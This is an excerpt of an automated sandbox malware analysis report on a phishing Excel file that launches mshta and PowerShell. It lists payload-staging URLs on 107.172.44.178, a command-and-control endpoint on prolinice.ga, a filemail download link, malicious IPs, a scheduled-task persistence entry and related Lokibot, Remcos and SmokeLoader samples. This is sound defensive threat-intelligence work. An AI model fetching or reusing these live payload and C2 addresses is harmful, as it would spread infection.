                                http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://107.172.44.178/53/seemybepowershell.exe, 00000006.00000002.447990130.0000000002281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494305051.000000000218B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta3mshta.exe, 00000005.00000003.421467560.00000000003D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423322872.00000000003D1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426031812.00000000003D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://go.microspowershell.exe, 00000006.00000002.447990130.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494305051.000000000218B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta7mshta.exe, 00000005.00000003.423322872.0000000000370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.421467560.0000000000371000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen93mshta.exe, 00000011.00000003.476368039.000000000015F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenM?mshta.exe, 00000011.00000003.476368039.000000000015F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF~powershell.exe, 00000013.00000002.509085075.000000001AC90000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://107.172.44.178/fW~(mshta.exe, 00000005.00000003.423125156.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.424134255.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.000000000329C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://contoso.com/powershell.exe, 00000006.00000002.453312735.00000000120B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.453312735.00000000120B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFspowershell.exe, 00000013.00000002.509085075.000000001AC90000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.autoitscript.com/autoit3explorer.exe, 0000001F.00000000.521354537.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenyXmshta.exe, 00000011.00000002.487556654.000000000012A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://ocsp.entrust.net0Dmshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.447990130.0000000002081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.511129884.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494305051.0000000001F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.560114781.0000000002471000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://go.crpowershell.exe, 00000006.00000002.454017233.000000001A832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenUw~Nmshta.exe, 00000011.00000002.487556654.000000000012A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFppowershell.exe, 00000006.00000002.447990130.0000000002281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494305051.000000000218B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenJmshta.exe, 00000011.00000003.476368039.00000000001B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6Spowershell.exe, 0000001C.00000002.560114781.0000000002672000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.piriform.com/ccleanerxeexplorer.exe, 0000001F.00000000.521769301.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.453312735.00000000120B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://link.uebie.de/vW~(mshta.exe, 00000005.00000003.423125156.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.424134255.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.000000000329C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://crl.entrust.net/server1.crl0mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htacmshta.exe, 00000011.00000002.488032754.0000000004970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaemshta.exe, 00000005.00000003.424122404.0000000003241000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426639453.0000000003241000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423310092.000000000323A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://prolinice.ga/explorer.exe, 00000026.00000002.601139642.0000000000644000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htahmshta.exe, 00000005.00000003.423293485.0000000002875000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486546130.0000000003165000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.482417273.0000000003165000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenespmshta.exe, 00000011.00000003.487328121.0000000003BBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487807567.0000000003BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://107.172.44.178/mshta.exe, 00000005.00000003.423125156.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.424134255.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487347079.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.482683098.0000000003C56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://contoso.com/Iconpowershell.exe, 00000006.00000002.453312735.00000000120B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drfalse
                                                            high
                                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchexplorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drfalse
                                                              high
                                                              https://link.uebie.de/~W~(mshta.exe, 00000005.00000003.423125156.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.424134255.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.000000000329C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaumshta.exe, 00000005.00000003.421467560.00000000003D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.google.com/favicon.ico402E.tmp.38.drfalse
                                                                high
                                                                https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenVw~Mmshta.exe, 00000011.00000003.487524489.000000000014D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486994334.000000000014C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.476368039.000000000014D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drfalse
                                                                  high
                                                                  http://java.sun.comexplorer.exe, 0000001F.00000000.521354537.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000001F.00000000.522442081.00000000072E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.521769301.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.522082384.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaCmshta.exe, 00000011.00000003.476368039.000000000015F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487590703.000000000015F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487807567.0000000003BBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487491030.000000000015F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486994334.000000000015F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF=powershell.exe, 00000006.00000002.454017233.000000001A8CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000026.00000002.601139642.0000000000644000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.piriform.com/ccleanerexplorer.exe, 0000001F.00000000.522442081.00000000072E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.521769301.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.522082384.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://107.172.44.178/53/cg/bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaMmshta.exe, 00000011.00000003.486994334.000000000014C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.476368039.000000000014D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://support.mozilla.orgexplorer.exe, 0000001F.00000000.521354537.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://prolinice.ga/index.phpMozilla/5.0explorer.exe, 00000026.00000002.601139642.0000000000614000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.573733607.000000000036E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.580498060.00000000002F4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.624702366.000000000023E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://secure.comodo.com/CPS0mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BDA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drfalse
                                                                                  high
                                                                                  http://crl.entrust.net/2048ca.crl0mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://link.uebie.de/mshta.exe, 00000005.00000002.426631892.0000000003230000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487347079.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487807567.0000000003BBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.482683098.0000000003C56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      46.173.214.24
                                                                                      prolinice.gaRussian Federation
                                                                                      47196GARANT-PARK-INTERNETRUtrue
                                                                                      142.215.209.78
                                                                                      ip.1017.filemail.comCanada
                                                                                      32156HUMBER-COLLEGECAfalse
                                                                                      5.45.108.48
                                                                                      link.uebie.deGermany
                                                                                      197540NETCUP-ASnetcupGmbHDEfalse
                                                                                      107.172.44.178
                                                                                      unknownUnited States
                                                                                      36352AS-COLOCROSSINGUStrue
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1557899
                                                                                      Start date and time:2024-11-18 18:20:11 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 9m 28s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                      Number of analysed new started processes analysed:47
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:1
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • GSI enabled (VBA)
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Sample name:#U3010TW-S PO#U3011PO#3311-20241118003.xls
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:TW-S POPO#3311-20241118003.xls
                                                                                      Detection:MAL
                                                                                      Classification:mal100.phis.troj.spyw.expl.evad.winXLS@62/54@11/4
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 70%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 99%
                                                                                      • Number of executed functions: 86
                                                                                      • Number of non-executed functions: 57
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .xls
                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                      • Attach to Office via COM
                                                                                      • Active ActiveX Object
                                                                                      • Active ActiveX Object
                                                                                      • Scroll down
                                                                                      • Close Viewer
                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 104.208.16.93
                                                                                      • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
                                                                                      • Execution Graph export aborted for target mshta.exe, PID 1264 because there are no executed function
                                                                                      • Execution Graph export aborted for target mshta.exe, PID 3544 because there are no executed function
                                                                                      • Execution Graph export aborted for target vtjrhji, PID 3728 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: #U3010TW-S PO#U3011PO#3311-20241118003.xls
                                                                                      TimeTypeDescription
                                                                                      09:22:41Task SchedulerRun new task: Firefox Default Browser Agent E441E35BB2CCF9DA path: C:\Users\user\AppData\Roaming\vtjrhji
                                                                                      12:21:30API Interceptor119x Sleep call for process: mshta.exe modified
                                                                                      12:21:34API Interceptor591x Sleep call for process: powershell.exe modified
                                                                                      12:21:46API Interceptor26x Sleep call for process: wscript.exe modified
                                                                                      12:21:50API Interceptor82x Sleep call for process: AcroRd32.exe modified
                                                                                      12:22:24API Interceptor893x Sleep call for process: explorer.exe modified
                                                                                      12:22:41API Interceptor132x Sleep call for process: taskeng.exe modified
                                                                                      12:22:44API Interceptor18x Sleep call for process: vtjrhji modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      142.215.209.78seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                        Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                          kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                            bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                  SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                    Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                      INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                          5.45.108.48Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                              Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                  New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                    Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                      Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                        Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                          New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                            Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              ip.1017.filemail.comseethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              • 142.215.209.78
                                                                                                                              prolinice.gaveryeasythingsevermadeforcreatenewthignsbetterthigns.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                                                                                              • 45.91.8.152
                                                                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                              • 185.251.91.119
                                                                                                                              40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                              • 185.251.91.119
                                                                                                                              #20240627_Edlen_B.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                              • 77.232.129.190
                                                                                                                              171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                              • 77.232.129.190
                                                                                                                              #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                              • 77.232.129.190
                                                                                                                              link.uebie.dePayment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                              • 5.45.108.48
                                                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 5.45.108.48
